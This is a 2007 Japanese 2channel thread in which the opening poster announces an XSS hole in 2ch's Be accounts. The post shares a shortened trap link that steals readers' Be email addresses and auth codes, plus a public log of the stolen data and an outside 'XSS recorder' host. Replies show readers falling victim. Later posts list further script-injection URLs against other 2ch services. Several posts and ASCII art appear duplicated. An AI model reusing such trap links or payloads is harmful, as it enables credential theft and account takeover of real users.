【速報】Beのメアドと認証コードが漏れるXSS脆弱性を発見
1 :動け動けウゴウゴ2ちゃんねる:
1 スレ立て代行@大学中退(兵庫県) [] 2007/11/27(火) 23:22:25 ID:EbtVATOs0● ?2BP(2350)
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で
任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、
それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。
サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。
http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)
▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/
これは色々とまずいようなきがします。
俺こと脱帽は、先日のいつか忘れたけど2chにXSSの脆弱性を発見した。
今回は通常のウェブブラウザ(除く専ブラ)からBeにログインした状態で
任意のURLにアクセスするとBeのメアドと認証コードが漏れる脆弱性であり、
それによってアカウント乗っ取りやプロフィールの変更が可能になってしまう。
現時点で数箇所のCGIで同脆弱性を確認しているが、この限りではない可能性もある。
サンプルURLを貼って置くが絶対に悪用しないよう注意を促したい。
http://z.la/ms0k2 (短縮URL、罠なので踏む時は注意)
http://moyashi.sosite.jp/xss/log.txt (盗まれた情報が記録されるファイル)
▼ 汎用XSS記録装置
http://moyashi.sosite.jp/xss/
▼ 俺公式サイト
http://manabi.homeunix.net/
これは色々とまずいようなきがします。
|
|
|
2 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 00:34:22 ID:BiWEf42U0
やめてええええええええ
3 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 00:40:46 ID:hayriGHG0
マジで焼かれたワロタ
4 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 00:53:11 ID:OJXhopJp0
メアド漏れた( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \
5 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 00:59:24 ID:cXD7ksHU0
ひろゆきに言え、Beは奴が責任者だ
6 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 01:04:47 ID:H5tmQZJK0
,,x-ー:: ":::::
,x '"::::::::::::::::::::
,、'":::::::::::::,, x-‐ ァ:
,,x '"::::::,,、- '" |:::
`"i`ー'" ヾ ハハ・・・二つも焼かれちまったぜ
! 、 、,,,,,,,,,;;;;;;;;;彡ミ ちょっと必死すぎなんじゃねえのか・・・?
|,,,,ノi `ーヾ;; '"----、
ヾ::ヽ -┴'~
~|:/ ' ' ' `ー ' "'"
/_
l '' ) i
ヽ,,、'~` U
゙, __ ,-、_,ノ`
|/ ゙, `'" ,,y
|/ 彡 ゙、`-'"
/|/ i
/ ! ,, -'"
| `ー '"|::
| /|||ヽ
/|||||/心
|ヾ/ /`ー
,x '"::::::::::::::::::::
,、'":::::::::::::,, x-‐ ァ:
,,x '"::::::,,、- '" |:::
`"i`ー'" ヾ ハハ・・・二つも焼かれちまったぜ
! 、 、,,,,,,,,,;;;;;;;;;彡ミ ちょっと必死すぎなんじゃねえのか・・・?
|,,,,ノi `ーヾ;; '"----、
ヾ::ヽ -┴'~
~|:/ ' ' ' `ー ' "'"
/_
l '' ) i
ヽ,,、'~` U
゙, __ ,-、_,ノ`
|/ ゙, `'" ,,y
|/ 彡 ゙、`-'"
/|/ i
/ ! ,, -'"
| `ー '"|::
| /|||ヽ
/|||||/心
|ヾ/ /`ー
7 :動け動けウゴウゴ2ちゃんねる:2007/11/28(水) 01:15:40 ID:DyV3F6vkP
ワロタ
8 :愛のかぁびぃ ◆Kirby..wFo :2007/11/28(水) 01:23:42 ID:tUYPIYmD0 BE:194794324-PLT(27981)
シネゴミ蛾
9 : 【bicycle:37】 ◆VipSineMLM :2007/11/28(水) 02:32:58 ID:Z7bMZ2MK0 BE:73813223-2BP(1086) 株優プチ(operate)
対策はどこのスレでとってるんだ
10 :オッサン ◆1.Fuck.nn. :2007/11/28(水) 02:35:50 ID:mw+zADomP
★複数板BEのメアドと認証コードが漏れるURLを張る人報告スレ
http://qb5.2ch.net/test/read.cgi/sec2chd/1196184490/
http://qb5.2ch.net/test/read.cgi/sec2chd/1196184490/
11 :n ◆q0uEtog.ao :2007/11/29(木) 01:50:36 ID:DZ71hxAK0
XSS発見しますた。
http://newsnavi.2ch.net/search/?q=%3C/title%3E%3C/head%3E%3Cscript%3Ealert(window)%3C/script%3E&e=
http://newsnavi.2ch.net/search/?q=%3C/title%3E%3C/head%3E%3Cscript%3Ealert(window)%3C/script%3E&e=
12 :n ◆q0uEtog.ao :2007/11/29(木) 02:25:16 ID:DZ71hxAK0
危険な香り。防いでおいた方が吉。
http://shop.2ch.net/image_gen.php?oid=22930240&type=text/html
http://shop.2ch.net/image_gen.php?oid=22930240&type=text/html
13 :n ◆q0uEtog.ao :2007/11/30(金) 01:02:05 ID:8KSMUT+q0
スレタイがエスケープされてません。
http://is.2ch.net/?query=%3C+%3E&enc=SJIS
http://is.2ch.net/?query=%3C+%3E&enc=SJIS
14 :動け動けウゴウゴ2ちゃんねる:2007/12/01(土) 18:27:43 ID:CzyMIsd/0 BE:803099096-S★(714700)
ぎゃ、、、
ここに書かないでメールで伝えたほうがいいと思います・・・・書いちゃうと前回と同じことになるかもだし
ここに書かないでメールで伝えたほうがいいと思います・・・・書いちゃうと前回と同じことになるかもだし